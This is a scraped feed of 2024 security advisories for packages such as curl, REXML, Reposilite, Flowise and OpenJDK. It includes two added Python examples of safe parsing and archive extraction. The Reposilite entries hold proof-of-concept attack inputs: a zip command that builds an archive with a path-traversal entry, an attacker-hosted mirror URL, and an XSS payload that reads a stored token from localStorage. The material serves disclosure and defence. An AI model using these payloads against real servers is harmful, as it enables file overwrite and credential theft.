https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-33GP-GMG3-HFPQ
31.07.2024 18:07:56ubuntu[USN-6935-1] Prometheus Alertmanager vulnerability (medium)prometheus-alertmanager could be made to expose sensitive information over the network.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6935-1
31.07.2024 13:51:55ubuntu[USN-6934-1] MySQL vulnerabilities (medium)Several security issues were fixed in MySQL.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6934-1
31.07.2024 11:17:56ubuntu[USN-6933-1] ClickHouse vulnerabilities (high)Several security issues were fixed in ClickHouse.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6933-1
31.07.2024 11:15:02alpinelinux[ALPINE:CVE-2024-7264] curl vulnerability[From CVE-2024-7264] libcurl's ASN.1 parser code has the `GTime2str()` function, used for parsing an ASN.1 GeneralizedTime field. If given a syntactically incorrect field, the parser might end up using -1 for the length of the *time fraction*, leading to a `strlen()` being performed on a pointer to a heap buffer area that is not (purposely) null terminated. This flaw most likely leads to a crash, but can also lead to heap contents being returned to the application when [CURLINFO_CERTINFO](https://curl.se/libcurl/c/CURLINFO_CERTINFO.html) is used.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-7264
31.07.2024 12:57:12curl[CURL-CVE-2024-7264] ASN.1 date parser overread (low)libcurl's ASN.1 parser code has the `GTime2str()` function, used for parsing an ASN.1 GeneralizedTime field. If given a syntactically incorrect field, the parser might end up using -1 for the length of the *time fraction*, leading to a `strlen()` being performed on a pointer to a heap buffer area that is not (purposely) null terminated. This flaw most likely leads to a crash, but can also lead to heap contents being returned to the application when [CURLINFO_CERTINFO](https://curl.se/libcurl/c/CURLINFO_CERTINFO.html) is used.https://secdb.nttzen.cloud/security-advisory/curl/CURL-CVE-2024-7264
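An illustrative strict parser for the field that `GTime2str()` handles, added here as an example and not curl's code: a value that is syntactically incorrect in the way the advisory describes (a fraction separator with no digits after it, a truncated field, a missing zone) is rejected by the grammar before any length is computed, so nothing downstream ever sees a negative fraction length. The grammar follows X.680 (`YYYYMMDDHH[MM[SS]][.fff][Z|+hhmm|-hhmm]`); RFC 5280 certificates use the `YYYYMMDDHHMMSSZ` subset. Rejecting zone-less local time is an assumption made for this example; X.680 permits it, RFC 5280 does not.

```python
"""Strict ASN.1 GeneralizedTime parsing (added example, not curl's code).

Grammar (X.680): YYYYMMDDHH[MM[SS]][.fff][Z|+hhmm|-hhmm]. RFC 5280
certificates use the YYYYMMDDHHMMSSZ subset. The regex is the whole
validation step: a separator with no digits, a truncated field or a
missing zone never reaches the arithmetic below.
"""
import re
from datetime import datetime, timedelta, timezone

_GENERALIZED_TIME = re.compile(
    rb"^(?P<year>\d{4})(?P<month>\d{2})(?P<day>\d{2})(?P<hour>\d{2})"
    rb"(?P<minute>\d{2})?(?P<second>\d{2})?"
    rb"(?:[.,](?P<fraction>\d+))?"   # a '.' or ',' must be followed by >= 1 digit
    rb"(?P<zone>Z|[+-]\d{4})$"       # zone required (assumption: no local time)
)


def fraction_length(field: bytes) -> int:
    """Digits in the fractional part, 0 if absent; never negative. Raises
    ValueError for a malformed field rather than returning a bogus length."""
    m = _GENERALIZED_TIME.match(field)
    if m is None:
        raise ValueError(f"malformed GeneralizedTime: {field!r}")
    frac = m.group("fraction")
    return len(frac) if frac else 0


def parse_generalized_time(field: bytes) -> datetime:
    """Parse a GeneralizedTime field into an aware datetime, or raise ValueError."""
    m = _GENERALIZED_TIME.match(field)
    if m is None:
        raise ValueError(f"malformed GeneralizedTime: {field!r}")
    g = m.groupdict()
    minute = int(g["minute"]) if g["minute"] else 0
    second = int(g["second"]) if g["second"] else 0

    # The fraction qualifies the smallest unit present (hour, minute or
    # second); convert it to microseconds with integer arithmetic, truncating.
    micro = 0
    if g["fraction"]:
        unit_us = 1_000_000 if g["second"] else 60_000_000 if g["minute"] else 3_600_000_000
        micro = int(g["fraction"]) * unit_us // 10 ** len(g["fraction"])

    zone = g["zone"]
    if zone == b"Z":
        tz = timezone.utc
    else:
        sign = 1 if zone[:1] == b"+" else -1
        off_h, off_m = int(zone[1:3]), int(zone[3:5])
        if off_h > 23 or off_m > 59:
            raise ValueError(f"invalid zone offset in {field!r}")
        tz = timezone(sign * timedelta(hours=off_h, minutes=off_m))

    try:
        base = datetime(int(g["year"]), int(g["month"]), int(g["day"]),
                        int(g["hour"]), minute, second, tzinfo=tz)
    except ValueError as exc:   # e.g. month 13, day 32, hour 24
        raise ValueError(f"invalid date/time in {field!r}: {exc}") from None
    return base + timedelta(microseconds=micro)


if __name__ == "__main__":
    for sample in (b"20240731235959Z", b"20240731235959.5Z", b"202407312359+0530",
                   b"20240731235959.", b"20240731235959.Z"):
        try:
            print(sample, "->", parse_generalized_time(sample).isoformat())
        except ValueError as exc:
            print(sample, "-> rejected:", exc)
```

The design point is that the length of the fraction is never derived by pointer or index subtraction on partially validated input: the match either yields a digit run or there is no fraction at all.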
31.07.2024 08:07:36ubuntu[USN-6932-1] OpenJDK 21 vulnerabilities (high)Several security issues were fixed in OpenJDK 21.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6932-1
31.07.2024 08:06:24ubuntu[USN-6931-1] OpenJDK 17 vulnerabilities (high)Several security issues were fixed in OpenJDK 17.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6931-1
31.07.2024 08:04:53ubuntu[USN-6930-1] OpenJDK 11 vulnerabilities (high)Several security issues were fixed in OpenJDK 11.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6930-1
31.07.2024 06:41:28ubuntu[USN-6929-1] OpenJDK 8 vulnerabilities (high)Several security issues were fixed in OpenJDK 8.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6929-1
31.07.2024 03:00:00debian[DSA-5735-1] chromiumsecurity updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5735-1
31.07.2024 03:00:00oraclelinux[ELSA-2024-4936] freeradius:3.0 security update (important)[3.0.20-15] - Backport BlastRADIUS CVE fix. Resolves: RHEL-46572https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4936
31.07.2024 18:29:36npm[NPM:GHSA-28MC-G557-92M7] @75lb/deep-merge Prototype Pollution vulnerability (high)Prototype pollution in @75lb/deep-merge 1.1.1 allows attackers to execute arbitrary code, cause a denial of service (DoS), or cause other impacts via the lodash merge methods used to merge objects.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-28MC-G557-92M7
02.08.2024 04:20:14npm[NPM:GHSA-5CF7-CXRF-MQ73] Bostr Improper Authorization vulnerability (moderate)Even when `authorized_keys` is filled with allowed pubkeys, if `noscraper` is enabled, anyone can use the bouncer even if their pubkey is not in `authorized_keys`. ### Impact - Private bouncer ### Patches Available in version [3.0.10](https://github.com/Yonle/bostr/releases/tag/3.0.10) ### Workarounds Disable `noscraper` if `authorized_keys` is set in the config. ### References This [line of code](https://github.com/Yonle/bostr/blob/8665374a66e2afb9f92d0414b0d6f420a95d5d2d/auth.js#L21) is the cause.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-5CF7-CXRF-MQ73
01.08.2024 23:25:09ubuntu[USN-6943-1] Tomcat vulnerabilities (high)Several security issues were fixed in Tomcat.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6943-1
01.08.2024 19:54:51ubuntu[USN-6909-2] Bind vulnerabilities (high)Several security issues were fixed in Bind.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6909-2
01.08.2024 18:09:46ubuntu[USN-6926-2] Linux kernel vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6926-2
01.08.2024 17:27:25ubuntu[USN-6942-1] Gross vulnerabilityGross could be made to crash or to allow arbitrary code execution.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6942-1
01.08.2024 16:39:54ubuntu[USN-6922-2] Linux kernel vulnerabilities (medium)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6922-2
01.08.2024 14:32:50ubuntu[USN-6941-1] Python vulnerabilityPython could allow unintended access to network services.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6941-1
01.08.2024 09:35:51ubuntu[USN-6940-1] snapd vulnerabilities (medium)Several security issues were fixed in snapd.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6940-1
01.08.2024 19:48:57rubysec[RUBYSEC:REXML-2024-41123] DoS vulnerabilities in REXML (medium)There are some DoS vulnerabilities in the REXML gem. These vulnerabilities have been assigned the CVE identifier CVE-2024-41123. We strongly recommend upgrading the REXML gem. ## Details When parsing an XML document that has many specific characters such as whitespace characters, `>]` and `]>`, the REXML gem may take a long time. Please update the REXML gem to version 3.3.3 or later. ## Affected versions * REXML gem 3.3.2 or prior ## Credits Thanks to mprogrammer and scyoon for discovering these issues. ## History Originally published at 2024-08-01 03:00:00 (UTC)https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:REXML-2024-41123
01.08.2024 19:48:57rubysec[RUBYSEC:REXML-2024-41946] DoS vulnerabilities in REXML (medium)There is a DoS vulnerability in the REXML gem. This vulnerability has been assigned the CVE identifier CVE-2024-41946. We strongly recommend upgrading the REXML gem. ## Details When parsing an XML document that has many entity expansions with the SAX2 or pull parser API, the REXML gem may take a long time. Please update the REXML gem to version 3.3.3 or later. ## Affected versions * REXML gem 3.3.2 or prior ## Credits Thanks to NAITOH Jun for discovering and fixing this issue. ## History Originally published at 2024-08-01 03:00:00 (UTC)https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:REXML-2024-41946
03.08.2024 00:32:27maven[MAVEN:GHSA-FRVJ-CFQ4-3228] Path traversal in Reposilite javadoc file expansion (arbitrary file creation/overwrite) (`GHSL-2024-073`) (high)### Summary Reposilite v3.5.10 is affected by an arbitrary file upload vulnerability via path traversal when expanding Javadoc archives. ### Details Reposilite provides support for Javadoc files, which are archives that contain documentation for artifacts. Specifically, the [JavadocEndpoints.kt](https://github.com/dzikoysk/reposilite/blob/68b73f19dc9811ccf10936430cf17f7b0e622bd6/reposilite-backend/src/main/kotlin/com/reposilite/javadocs/infrastructure/JavadocEndpoints.kt#L28) controller allows expanding the javadoc archive into the server's file system and returning its content. The problem is in the way the archives are expanded, specifically how the new filename is created: [JavadocContainerService.kt#L127-L136](https://github.com/dzikoysk/reposilite/blob/68b73f19dc9811ccf10936430cf17f7b0e622bd6/reposilite-backend/src/main/kotlin/com/reposilite/javadocs/JavadocContainerService.kt#L127-L136) ```kotlin jarFile.entries().asSequence().forEach { file -> if (file.isDirectory) { return@forEach } val path = Paths.get(javadocUnpackPath.toString() + "/" + file.name) path.parent?.also { parent -> Files.createDirectories(parent) } jarFile.getInputStream(file).copyToAndClose(path.outputStream()) }.asSuccess<Unit, ErrorResponse>() ``` The `file.name` taken from the archive can contain path traversal sequences, such as '/../../../anything.txt', so the resulting extraction path can be outside the target directory. ### Impact If the archive is taken from an untrusted source, such as Maven Central or JitPack, an attacker can craft a special archive to overwrite any local file on the Reposilite instance. This could lead to remote code execution, for example by placing a new plugin into the '$workspace$/plugins' directory. Alternatively, an attacker can overwrite the content of any other package. Note that the attacker can use their own malicious package from Maven Central to overwrite any other package on Reposilite. ### Steps to reproduce 1. Create a malicious javadoc archive that contains filenames with path traversal sequences: ```bash zip test-1.0-javadoc.jar ../../../../../../../../tmp/evil.txt index.html ``` Make sure that `../../../../../../../../tmp/evil.txt` and `index.html` exist on the system where you create this archive. 2. Publish this archive to the repository which Reposilite is mirroring, such as Maven Central or JitPack. For test purposes, I used my own server that imitates the upstream maven repository: http://artsploit.com/maven/com/artsploit/reposilite-zipslip/1.0/reposilite-zipslip-1.0-javadoc.jar 3. Start Reposilite with the 'releases' repository mirroring 'http://artsploit.com/maven/'. 4. Now, if the attacker sends a request to http://localhost:8080/javadoc/releases/com/artsploit/reposilite-zipslip/1.0, the aforementioned archive will be obtained from the http://artsploit.com/maven/com/artsploit/reposilite-zipslip/1.0/reposilite-zipslip-1.0-javadoc.jar address and its 'evil.txt' file will be expanded to '$workspace$/tmp/evil.txt'. Note that to perform this action, an attacker does not need to provide any credentials, as fetching from the mirrored repository does not require authentication. 5. Confirm that '$workspace$/tmp/evil.txt' is created on the server where Reposilite is running. ### Remediation Normalize (remove all occurrences of `/../`) the `file.name` variable before concatenating it with `javadocUnpackPath`, e.g.: ```kotlin val path = Paths.get(javadocUnpackPath.toString() + "/" + Paths.get(file.name).normalize().toString()) ``` https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-FRVJ-CFQ4-3228
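The containment check that the Kotlin snippet above lacks, as an added example in Python (not Reposilite's code): every entry name is resolved against the unpack directory and rejected when the result escapes it, and all entries are validated before anything is written. It also shows the caveat a reviewer would raise on the suggested remediation: normalising the entry name keeps leading `..` components (`posixpath.normpath` and `java.nio.file.Path.normalize` both do), so normalisation alone does not confine the path; the resolved path has to be compared against the base directory. The archive contents are constructed inline for the demonstration and involve no real artifact.

```python
"""Safe expansion of an untrusted javadoc archive (added example, not Reposilite code).

Each entry name is resolved against the unpack directory and rejected if the
result lands outside it; all entries are validated before any is written, so a
hostile archive yields no partial extraction.
"""
import io
import pathlib
import posixpath
import tempfile
import zipfile
from typing import Dict, List


class UnsafeEntry(ValueError):
    """Raised for an archive entry whose name would escape the unpack directory."""


def normalize_only(name: str) -> str:
    """Plain normalisation, shown for comparison: a leading '..' is preserved,
    which is why normalising file.name by itself does not confine the path."""
    return posixpath.normpath(name)


def resolve_entry(unpack_dir: pathlib.Path, name: str) -> pathlib.Path:
    """Map an archive entry name to an on-disk path strictly inside unpack_dir.

    Raises UnsafeEntry for '..' traversal, absolute names and names that
    resolve to unpack_dir itself. Both sides are fully resolved before the
    comparison, so symlinked parents and '.'/'..' components are accounted for.
    Backslashes are folded to '/' so 'a\\..\\..\\x' cannot bypass the check on
    Windows, where they are separators.
    """
    base = unpack_dir.resolve()
    candidate = (base / name.replace("\\", "/")).resolve()
    if base not in candidate.parents:
        raise UnsafeEntry(f"{name!r} resolves to {candidate}, outside {base}")
    return candidate


def expand_javadoc(archive: bytes, unpack_dir: pathlib.Path) -> List[str]:
    """Expand a jar/zip into unpack_dir and return the entry names written.

    Pass 1 validates every entry; pass 2 writes. One bad entry aborts the whole
    expansion before any file is touched.
    """
    with zipfile.ZipFile(io.BytesIO(archive)) as jar:
        files = [info for info in jar.infolist() if not info.is_dir()]
        targets = [(info, resolve_entry(unpack_dir, info.filename)) for info in files]
        for info, target in targets:
            target.parent.mkdir(parents=True, exist_ok=True)
            with jar.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
    return [info.filename for info, _ in targets]


def build_jar(entries: Dict[str, str]) -> bytes:
    """Build an in-memory jar from {entry name: content}. ZipFile.writestr stores
    the name verbatim, '..' components included, just as a hostile publisher would."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        for name, content in entries.items():
            jar.writestr(name, content)
    return buf.getvalue()


# Constructed samples for the demonstration; no real artifact is involved.
BENIGN_JAR = build_jar({"index.html": "<html>docs</html>"})
MALICIOUS_JAR = build_jar({
    "index.html": "<html>docs</html>",
    "../../../../../../../../tmp/evil.txt": "pwned",   # the advisory's traversal entry
})


def run_demo() -> dict:
    """Expand both samples into a fresh temp dir and report what happened."""
    workdir = pathlib.Path(tempfile.mkdtemp())
    result = {"benign": expand_javadoc(BENIGN_JAR, workdir / "benign")}
    try:
        expand_javadoc(MALICIOUS_JAR, workdir / "evil")
        result["malicious_rejected"] = False
    except UnsafeEntry as exc:
        result["malicious_rejected"] = True
        result["reason"] = str(exc)
    # Because validation precedes writing, not even index.html was extracted.
    result["partial_write"] = (workdir / "evil" / "index.html").exists()
    return result


if __name__ == "__main__":
    print(run_demo())
```

Comparing resolved paths rather than string prefixes also avoids the classic mistake of accepting `/srv/javadoc-other/...` because it starts with `/srv/javadoc`.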
03.08.2024 00:12:57maven[MAVEN:GHSA-9W8W-34VR-65J2] Reposilite artifacts vulnerable to Stored Cross-site Scripting (high)### Summary Reposilite v3.5.10 is affected by stored cross-site scripting (XSS) when displaying an artifact's content in the browser. ### Details As a Maven repository manager, Reposilite provides the ability to view artifact content in the browser, as well as to perform administrative tasks via its API. The problem lies in the fact that the artifact's content is served from the same origin (protocol/host/port) as the Admin UI. If the artifact contains HTML content with JavaScript inside, the JavaScript is executed within the same origin. Therefore, if an authenticated user views the artifact's content, the JavaScript inside can access the browser's local storage, where the user's password (aka 'token-secret') is stored. It is especially dangerous in scenarios where Reposilite is configured to mirror third-party repositories, like the Maven Central Repository. Since anyone can publish an artifact to Maven Central under their own name, such malicious packages can be used to attack the Reposilite instance. ### Steps to reproduce To demonstrate this vulnerability, we can start Reposilite with default settings at localhost:8080 and configure its 'release' repository to mirror https://artsploit.com/maven. This is my own website intended to emulate http://repo1.maven.org/, but it also contains a proof-of-concept payload for this vulnerability. Technically I could publish this payload to the Maven Central Repository, but I don't want to clutter it. Then, as an administrator or authenticated Reposilite user, navigate to http://localhost:8080/releases/com/artsploit/reposilite-xss/1.0/reposilite-xss-1.0.pom in the browser. This file contains the basic `application/xml` payload: ```xml <?xml version="1.0" encoding="UTF-8"?><a:script xmlns:a="http://www.w3.org/1999/xhtml"> alert(`Secret key: ${localStorage.getItem('token-secret')}`)</a:script> ``` The script will be executed within the http://localhost:8080/ origin and the leaked token is displayed. ![image](https://github.com/dzikoysk/reposilite/assets/44605151/e6324fc8-fa7f-485c-90b3-19640c179773) ### Impact This issue may lead to full compromise of the Reposilite instance. If this attack is performed against the admin user, it's possible to use the admin API to modify settings and artifacts on the instance. In the worst-case scenario, an attacker would be able to obtain remote code execution on all systems that use artifacts from Reposilite. It's important to note that the attacker does not need to lure a victim user into using a malicious artifact, but just into opening a link in the browser. This link can be silently loaded among other HTML content, making this attack unnoticeable. Even if the Reposilite instance is located in an isolated environment, such as behind a VPN or in the local network, this attack is still possible as it can be performed from the admin's browser. ### Remediation When serving an artifact's content over HTTP, it's important to understand that this content might be untrusted HTML code, so JavaScript execution should be restricted. Consider the following options to remediate this vulnerability: * [preferred] Use the "Content-Security-Policy: sandbox;" header when serving artifact content. This makes the resource be treated as coming from a special origin that always fails the same-origin policy (preventing access to data storage/cookies and some JavaScript APIs). * [not preferred, but also works] Use the "Content-Disposition: attachment" header. This will prevent the browser from displaying the content entirely, so it just saves it to the local filesystem. Additionally, we strongly recommend reconsidering how website authentication works for Reposilite. Storing the user's password in plaintext in the browser's local storage is not an ideal option. The more robust and secure option would be to issue a one-time session ID or token to the browser after checking the login/password on the server. These session IDs or tokens should have a limited validity time, so their compromise would be trickier to exploit.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-9W8W-34VR-65J2
02.08.2024 18:16:43maven[MAVEN:GHSA-V352-RG37-5Q5M] Apache Linkis vulnerable to privilege escalation (moderate)In Apache Linkis <= 1.5.0, Privilege Escalation in Basic management services where the attacking user is a trusted account allows access to Linkis's Token information. Users are advised to upgrade to version 1.6.0, which fixes this issue.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-V352-RG37-5Q5M
02.08.2024 18:16:26maven[MAVEN:GHSA-QFF2-8QW7-HCVW] Apache Inlong Code Injection vulnerability (critical)Improper Control of Generation of Code ('Code Injection') vulnerability in Apache InLong.This issue affects Apache InLong: from 1.10.0 through 1.12.0, which could lead to Remote Code Execution. Users are advised to upgrade to Apache InLong's 1.13.0 or cherry-pick [1] to solve it.[1]  https://github.com/apache/inlong/pull/10251https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-QFF2-8QW7-HCVW
02.08.2024 18:16:08maven[MAVEN:GHSA-J6VX-R77H-44WC] Apache Linkis arbitrary file deletion vulnerability (high)In Apache Linkis <= 1.5.0, arbitrary file deletion in Basic management services: a user with an administrator account could delete any file accessible by the Linkis system user. Users are recommended to upgrade to version 1.6.0, which fixes this issue.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-J6VX-R77H-44WC
02.08.2024 12:36:04ubuntu[USN-6895-4] Linux kernel vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6895-4
03.08.2024 05:22:00rubysec[RUBYSEC:REXML-2024-41123] DoS vulnerabilities in REXML (medium)There are some DoS vulnerabilities in the REXML gem. These vulnerabilities have been assigned the CVE identifier CVE-2024-41123. We strongly recommend upgrading the REXML gem. ## Details When parsing an XML document that has many specific characters such as whitespace characters, `>]` and `]>`, the REXML gem may take a long time. Please update the REXML gem to version 3.3.3 or later. ## Affected versions * REXML gem 3.3.2 or prior ## Credits Thanks to mprogrammer and scyoon for discovering these issues. ## History Originally published at 2024-08-01 03:00:00 (UTC)https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:REXML-2024-41123
03.08.2024 16:38:42rubysec[RUBYSEC:REXML-2024-41946] DoS vulnerabilities in REXML (medium)There is a DoS vulnerability in the REXML gem. This vulnerability has been assigned the CVE identifier CVE-2024-41946. We strongly recommend upgrading the REXML gem. ## Details When parsing an XML document that has many entity expansions with the SAX2 or pull parser API, the REXML gem may take a long time. Please update the REXML gem to version 3.3.3 or later. ## Affected versions * REXML gem 3.3.2 or prior ## Credits Thanks to NAITOH Jun for discovering and fixing this issue. ## History Originally published at 2024-08-01 03:00:00 (UTC)https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:REXML-2024-41946
06.08.2024 00:29:30npm[NPM:GHSA-858C-QXVX-RG9V] Flowise Cross-site Scripting in /api/v1/chatflows-streaming/id (moderate)Flowise is a drag & drop user interface to build a customized large language model flow. In version 1.4.3 of Flowise, a reflected cross-site scripting vulnerability exists in the `/api/v1/chatflows-streaming/id` endpoint. If the default configuration is used (unauthenticated), an attacker may be able to craft a URL that injects JavaScript into the user's session, allowing the attacker to steal information, create fake popups, or even redirect the user to other websites without interaction. If the chatflow ID is not found, its value is reflected in the 404 page, which has type text/html. This allows an attacker to attach arbitrary scripts to the page and steal sensitive information. This XSS may be chained with the path injection to allow an attacker without direct access to Flowise to read arbitrary files from the Flowise server. As of time of publication, no known patches are available.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-858C-QXVX-RG9V
06.08.2024 00:29:30npm[NPM:GHSA-WXM4-9F8P-GGGV] Flowise Cross-site Scripting in /api/v1/credentials/id (moderate)Flowise is a drag & drop user interface to build a customized large language model flow. In version 1.4.3 of Flowise, a reflected cross-site scripting vulnerability exists in the `/api/v1/credentials/id` endpoint. If the default configuration is used (unauthenticated), an attacker may be able to craft a URL that injects JavaScript into the user's session, allowing the attacker to steal information, create fake popups, or even redirect the user to other websites without interaction. If the chatflow ID is not found, its value is reflected in the 404 page, which has type text/html. This allows an attacker to attach arbitrary scripts to the page and steal sensitive information. This XSS may be chained with the path injection to allow an attacker without direct access to Flowise to read arbitrary files from the Flowise server. As of time of publication, no known patches are available.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-WXM4-9F8P-GGGV
06.08.2024 00:29:29npm[NPM:GHSA-2JCH-QC96-9F5G] Flowise Cross-site Scripting in api/v1/chatflows/id (moderate)Flowise is a drag & drop user interface to build a customized large language model flow. In version 1.4.3 of Flowise, a reflected cross-site scripting vulnerability exists in the `api/v1/chatflows/id` endpoint. If the default configuration is used (unauthenticated), an attacker may be able to craft a URL that injects JavaScript into the user's session, allowing the attacker to steal information, create fake popups, or even redirect the user to other websites without interaction. If the chatflow ID is not found, its value is reflected in the 404 page, which has type text/html. This allows an attacker to attach arbitrary scripts to the page and steal sensitive information. This XSS may be chained with the path injection to allow an attacker without direct access to Flowise to read arbitrary files from the Flowise server. As of time of publication, no known patches are available.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-2JCH-QC96-9F5G
06.08.2024 00:29:29npm[NPM:GHSA-FCCX-2PWJ-HRQ7] Flowise Cross-site Scripting in /api/v1/public-chatflows/id (moderate)Flowise is a drag & drop user interface to build a customized large language model flow. In version 1.4.3 of Flowise, a reflected cross-site scripting vulnerability exists in the `/api/v1/public-chatflows/id` endpoint. If the default configuration is used (unauthenticated), an attacker may be able to craft a URL that injects JavaScript into the user's session, allowing the attacker to steal information, create fake popups, or even redirect the user to other websites without interaction. If the chatflow ID is not found, its value is reflected in the 404 page, which has type text/html. This allows an attacker to attach arbitrary scripts to the page and steal sensitive information. This XSS may be chained with the path injection to allow an attacker without direct access to Flowise to read arbitrary files from the Flowise server. As of time of publication, no known patches are available.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-FCCX-2PWJ-HRQ7
06.08.2024 00:29:28maven[MAVEN:GHSA-W7C4-5W4F-JM3G] Reposilite Arbitrary File Read vulnerability (high)Reposilite is an open source, lightweight and easy-to-use repository manager for Maven based artifacts in JVM ecosystem. Reposilite v3.5.10 is affected by an Arbitrary File Read vulnerability via path traversal while serving expanded javadoc files. Reposilite has addressed this issue in version 3.5.12. There are no known workarounds for this vulnerability. This issue was discovered and reported by the GitHub Security lab and is also tracked as GHSL-2024-074.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-W7C4-5W4F-JM3G
06.08.2024 00:29:28npm[NPM:GHSA-H997-3FXJ-P5J8] Flowise Path Injection at /api/v1/openai-assistants-file (high)Flowise is a drag & drop user interface to build a customized large language model flow. In version 1.4.3 of Flowise, the `/api/v1/openai-assistants-file` endpoint in `index.ts` is vulnerable to arbitrary file read due to lack of sanitization of the `fileName` body parameter. No known patches for this issue are available.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-H997-3FXJ-P5J8
06.08.2024 00:29:28npm[NPM:GHSA-66F2-XXGM-F6XP] Flowise CORS Misconfiguration in packages/server/src/index.ts (high)Flowise is a drag & drop user interface to build a customized large language model flow. In version 1.4.3 of Flowise, a CORS misconfiguration sets the Access-Control-Allow-Origin header to `*` (all origins), allowing arbitrary origins to connect to the website. In the default configuration (unauthenticated), arbitrary origins may be able to make requests to Flowise, stealing information from the user. This CORS misconfiguration may be chained with the path injection to allow attackers without access to Flowise to read arbitrary files from the Flowise server. As of time of publication, no known patches are available.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-66F2-XXGM-F6XP
06.08.2024 00:29:25npm[NPM:GHSA-QF3Q-9F3H-CJP9] NextChat has full-read SSRF and XSS vulnerability in /api/cors endpoint (critical)NextChat, also known as ChatGPT-Next-Web, is a cross-platform chat user interface for use with ChatGPT. Versions 2.11.2 and prior are vulnerable to server-side request forgery and cross-site scripting. This vulnerability enables read access to internal HTTP endpoints but also write access using HTTP POST, PUT, and other methods. Attackers can also use this vulnerability to mask their source IP by forwarding malicious traffic intended for other Internet targets through these open proxies. As of time of publication, no patch is available, but other mitigation strategies are available. Users may avoid exposing the application to the public internet or, if exposing the application to the internet, ensure it is on an isolated network with no access to any other internal resources.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-QF3Q-9F3H-CJP9
06.08.2024 00:29:23maven[MAVEN:GHSA-F984-3WX8-GRP9] XXL-RPC Deserialization of Untrusted Data vulnerability (critical)XXL-RPC is a high performance, distributed RPC framework. With it, a TCP server can be set up using the Netty framework and the Hessian serialization mechanism. When such a configuration is used, attackers may be able to connect to the server and provide malicious serialized objects that, once deserialized, force it to execute arbitrary code. This can be abused to take control of the machine the server is running by way of remote code execution. This issue has not been fixed.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-F984-3WX8-GRP9
06.08.2024 00:29:23maven[MAVEN:GHSA-4HVC-QWR2-F8RV] Redisson vulnerable to Deserialization of Untrusted Data (critical)Redisson is a Java Redis client that uses the Netty framework. Prior to version 3.22.0, some of the messages received from the Redis server contain Java objects that the client deserializes without further validation. Attackers that manage to trick clients into communicating with a malicious server can include specially crafted objects in its responses that, once deserialized by the client, force it to execute arbitrary code. This can be abused to take control of the machine the client is running on. Version 3.22.0 contains a patch for this issue. Some post-fix advice is available. Do NOT use `Kryo5Codec` as the deserialization codec, as it is still vulnerable to arbitrary object deserialization due to the `setRegistrationRequired(false)` call. On the contrary, `KryoCodec` is safe to use. The fix applied to `SerializationCodec` only consists of adding an optional allowlist of class names, even though making this behavior the default is recommended. When instantiating `SerializationCodec`, please use the `SerializationCodec(ClassLoader classLoader, Set<String> allowedClasses)` constructor to restrict the allowed classes for deserialization.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4HVC-QWR2-F8RV
06.08.2024 00:29:23 | npm | [NPM:GHSA-XMHH-XRCC-MX36] Scrypted Cross-site Scripting vulnerability (moderate) | Scrypted is a home video integration and automation platform. In versions 0.55.0 and prior, a reflected cross-site scripting vulnerability exists in the plugin-http.ts file via the `owner` and `pkg` parameters. An attacker can run arbitrary JavaScript code. As of time of publication, no known patches are available. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-XMHH-XRCC-MX36
06.08.2024 00:29:23 | npm | [NPM:GHSA-WW7P-8GFG-V82R] Scrypted Cross-site Scripting vulnerability (moderate) | Scrypted is a home video integration and automation platform. In versions 0.55.0 and prior (corresponding to `@scrypted/core` 0.1.142 and prior), a reflected cross-site scripting vulnerability exists in the login page via the `redirect_uri` parameter. By specifying a URL with the javascript scheme (`javascript:`), an attacker can run arbitrary JavaScript code after the login. As of time of publication, no known patches are available. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-WW7P-8GFG-V82R
